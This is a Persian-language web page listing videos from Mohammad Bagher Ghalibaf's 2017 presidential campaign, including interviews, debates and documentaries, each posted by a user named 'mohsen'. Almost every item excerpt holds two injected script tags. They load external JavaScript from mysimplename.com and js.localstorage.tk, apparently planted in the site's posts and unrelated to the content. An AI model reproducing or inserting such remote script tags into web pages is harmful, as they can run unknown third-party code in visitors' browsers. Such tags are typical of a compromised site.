برنامه های تبلیغاتی محمدباقر قالیباف

برنامه های تبلیغاتی محمدباقر قالیباف

برنامه های رسانه ای محمدباقر قالیباف یکی از کاندیدهای انتخابات ریاست جمهوری سال 1396

اظهارات انتخاباتی محمدباقر قالیباف در شبکه خبر

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فیلم کامل اظهارات انتخاباتی محمدباقر قالیباف در شبکه خبر را ببینید. <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

فیلم کامل دومین مستند جنجالی انتخاباتی قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فیلم کامل دومین مستند جنجالی انتخاباتی قالیباف + تصاویر منتشرنشده از حمله کارگران معدن به خودروی حامل روحانی <script type='text/javascript' src='https://js....
mohsen
توسط mohsen

گفتگوی ویژه خبری | محمدباقر قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های انتخابات ریاست جمهوری96<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

سومین مناظره انتخاباتی | اظهارات قالیباف و نقد‌های کاندیداها

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>محمدباقر قالیباف کاندیدای دوازدهمین انتخابات ریاست جمهوری در سومین مناظره انتخابات ریاست جمهوری درخصوص برنامه‌های خود صحبت کرد. <script type='text/javascript' src='...
mohsen
توسط mohsen

گفتگو با کارشناسان | محمدباقر قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های انتخابات ریاست جمهوری 96<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

اولین مستند | محمدباقر قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های انتخابات ریاست جمهوری96<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

مناظره دوم-بخش اول | اظهارات قالیباف و نقد‌های کاندیداها

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>محمدباقرقالیباف کاندیدای دوازدهمین انتخابات ریاست جمهوری در دومین مناظره انتخابات ریاست جمهوری درخصوص برنامه‌های خود صحبت کرد. <script type='text/javascript' src='...
mohsen
توسط mohsen

گفتگوی ضبط شده | محمدباقر قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه انتخابات96<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

گفتگوی ویژه خبری | محمد باقر قالیباف

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های ریاست جمهوری ۹۶<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

نظر نامزدهای ریاست جمهوری درباره نخستین مناظره تلویزیونی

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>نظر نامزدهای ریاست جمهوری درباره نخستین مناظره تلویزیونی که عصر جمعه برگزار شد<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></...
mohsen
توسط mohsen

نظر نامزدهای ریاست جمهوری درباره  نخستین مناظره تلویزیونی